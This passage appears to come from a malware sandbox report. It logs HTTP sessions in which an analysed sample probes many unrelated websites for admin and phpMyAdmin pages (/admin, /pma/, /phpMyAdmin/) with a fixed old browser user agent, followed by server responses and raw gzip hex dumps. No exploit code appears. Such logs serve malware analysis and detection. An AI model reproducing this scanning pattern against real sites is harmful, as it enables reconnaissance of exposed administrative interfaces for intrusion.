                                                                                                                                                                                                                                                                                                                                                                Content-Length: 269
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131767601_1611129006_213793893_11_11593_136_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 37 26 23 34 36 3b 63 62 65 33 63 36 35 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3c65</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                440192.168.2.663507162.241.203.3080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.549551964 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.666007996 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                441192.168.2.663547104.21.14.24580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.554266930 CET170OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.685595989 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4L5oo9gz1LN%2BLS%2FGlzDuCvv5bsiUERbB%2F6alq9FXrZQoh9FFkoG3ciaq%2B8WI%2Fui8Z1LWkIkAMsRgAFE8Td2TcDdKulXyPM3B%2BRcPGRi2Gykuh%2BKKoub61DzSnFVmk9lIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4b8b88b0bb-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 36 12 fd df 9f 62 a2 03 12 1b b0 24 7b bb 7b eb 24 b2 0e bd dd 14 08 b0 45 f7 ba 59 b4 8b 62 11 50 e4 c8 62 43 91 2a 49 59 31 d2 7c f7 82 a2 e4 c8 3f 92 de e2 0e 08 10 51 1c be 99 79 7c 33 22 9d 9c bc ff e9 dd cd 97 8f 57 50 d8 52 a4 a3 e4 24 0c 7f e3 39 08 0b d7 57 f0 f6 6b 0a 89 9b 00 2a 88 31 cb 40 aa f0 77 03 1c ff 09 4a 30 8e 01 08 22 57 cb 00 65 f8 f9 53 90 42 72 f2 1b 4a c6 f3 af 61 f8 04 d5 e1 00 1c 87 7a fb 6d 50 8b 17 a0 16 df 00 b5 b2 1d 9a 7b 71 2c cb 43 94 30 dc 45 2a 90 b0 74 94 58 6e 05 a6 df 5b 8b d2 72 25 e1 67 fc a3 e6 1a d9 09 fc 09 ef 84 aa 59 2e 88 c6 24 f6 76 a3 a4 44 4b 80 16 44 1b b4 cb e0 f3 cd 0f e1 22 80 b8 9f 28 ac ad 42 87 b0 5e 06 ef 94 74 a0 e1 cd a6 c2 00 a8 1f 2d 03 8b f7 36 76 f1 5e 6e 61 5e 42 f9 35 fc fc 7d f8 4e 95 15 b1 3c 13 43 a0 eb ab e5 15 5b e1 60 9d 24 25 2e 03 ad 32 65 cd c0 50 2a 2e 19 de 4f 41 aa 5c 09 a1 9a 83 25 6b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 92 e1 9a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 72 ee 51 04 97 77 a0 51 2c 03 63 37 02 4d 81 68 03 e0 6c 19 d0 fc d6 bf 0a a9 31 01 14 1a f3 65 10 53 26 43 ba e2 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a f7 35 7c fe 35 7d de c5 d9 93 0b 8e ce cb d9 df 7a e1 d8 3b da 55 43 6b 98 66 8a 6d 1e 4a a2 57 5c 5e cc 2e 2b c2 18 97 ab 8b d9 63 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 27 92 ac f9 8a 58 a5 23 aa d4 1d c7 2b 49 32 81 6c 02 0f 23 57 02 0d 97 4c 35 11 61 ec 6a 8d d2 7e e0 c6 a2 44 3d 3e 7b ff d3 8f 9d 72 3e 28 c2 90 9d 4d 21 af 25 6d c5 39 ee 57 03 ac 89 86 0e 58 c0 12 98 a2 75 89 d2 46 2b b4 57 02 dd e3 bf 37 d7 6c 7c e6 6d 42
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xo6b${{$EYbPbC*IY1|?Qy|3"WPR$9Wk*1@wJ0"WeSBrJazmP{q,C0E*tXn[r%gY.$vDKD"(B^t-6v^na^B5}N<C[`$%.2eP*.OA\%kM,j8SKn9DrQwQ,c7Mhl1eS&CiJ55|5}z;UCkfmJW\^.+ch@tgGW6'X#+I2l#WL5aj~D=>{r>(M!%m9WXuF+W7l|mB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.685635090 CET1200INData Raw: 22 50 db b3 c9 65 b7 ba 5f 19 b5 79 45 8c 9b 4a 90 0d 2c e1 2c 13 8a de 9d 79 bb c7 c9 08 e0 71 94 c4 7d 6a 07 55 34 1a 25 71 57 48 8e 3b 97 7c c2 f8 ba db ff b0 d1 a4 aa 50 07 69 0b d7 ce 74 45 4a 73 1f 12 f4 0f 61 bb 41 6e d8 45 dc 8e 3b 25 0d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "Pe_yEJ,,yq}jU4%qWH;|PitEJsaAnE;%rKB4Xt%F&H?$25Q3EzZmt;{M#5jW^hiu)lTY#dZ#dI\h:{ILEe-/X~&@uN#$.^mIh)u
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.703330994 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                442192.168.2.66348054.183.63.24180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.556082010 CET172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749548912 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: AyJhOT
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f ed 91 90 01 7c 18 11 1d 73 0e 9f 2d 12 91 02 7c 18 11 3d 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 123b;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo|s-|=
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749619961 CET1286INData Raw: bc b7 4d 49 a4 00 1f 46 c4 6e 67 0e 9f 2d 12 91 02 7c 18 11 03 90 de 60 9b ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 89 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0 fb b0 57 42 9f f5 fd 3e 04 0c fb f3 61 bf 84 5e f5 7c 5b e4
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MIFng-|`HV")3_9y79I>CWB>a^|[4tb9=y@`wT]YEs_u)2t1IRK-"P%+Xd<|u-V:i8+#.<pD-D}G#}V,-.%FhN`Glm?7
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749658108 CET1286INData Raw: 34 9a 92 d7 1f 75 87 93 e1 d1 51 e3 41 db 91 74 7d 33 5f bb 1a fe 37 55 a2 f7 74 aa cd 01 bb 6a da 5a e0 06 6e ef 09 5b a9 e3 7e 08 52 cd 15 5d b3 33 39 de 3b 6d 97 31 5d c3 56 8b 5f 8b 65 11 b6 62 3f 9f 0b 7b 64 16 3a 3f 19 07 46 ba 77 56 6f 3f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4uQAt}3_7UtjZn[~R]39;m1]V_eb?{d:?FwVo?'y<&=G^1b$#F:mgIIbe8T^xQMaiPa@&_uvw:kul5g]#}K`wiCQoh}Mh{89w c!gbc`
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749694109 CET1286INData Raw: fd ec 00 39 ca 6f ba c1 0e e0 da 49 ef 67 11 b5 b1 82 02 6c aa 47 52 83 79 8e 77 95 4f 8b d9 54 5f ee c5 60 83 80 c5 d9 a1 a6 65 d7 c8 56 66 a6 9b 6c e6 68 85 4d 13 4e f1 1c 28 a4 80 06 16 6b 65 31 1c 6c 92 0d 1a 5f c4 85 bc 90 5e 80 76 75 02 86
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9oIglGRywOT_`eVflhMN(ke1l_^vu5Xks]$'ae*z>lo5u5/]}7dt*%A:o:?A"m9x$&p.<GD;a&D\<Z5xPP1X9@kpoK:
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749727011 CET280INData Raw: 61 34 30 ed 5c bc c0 37 25 7f f6 e4 45 c7 c4 ff ef 70 5c 6d 3c 09 13 28 20 b6 1c d3 2f b9 85 91 ea 14 9d 78 ba 9d 98 5b f2 a3 42 81 27 a8 cb e4 0d 6c 8e 23 61 b6 d3 12 ef 9c 4d 13 d8 c1 40 82 df b2 20 af 28 be 94 03 99 a9 c6 b7 e4 6a ad 6c 9d 5c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a40\7%Ep\m<( /x[B'l#aM@ (jl\&]B!uMz'S>Qc_,9+-n}:(ezJ00BY}~^{vsHKHg(.N7[0"5*|DxgxP


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                443192.168.2.663576195.85.23.9580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.570847034 CET171OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.812014103 CET1226INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; path=/; domain=.bongacams.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/admin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded7546-web23
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: fv=AmL3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4bae784546-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 72 6f 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 65<html><head><meta http-equiv="refresh" content="0;url=https://ro.bongacams.com/admin"/></head></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.812050104 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                444192.168.2.66337854.71.181.16080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.575823069 CET182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749387980 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
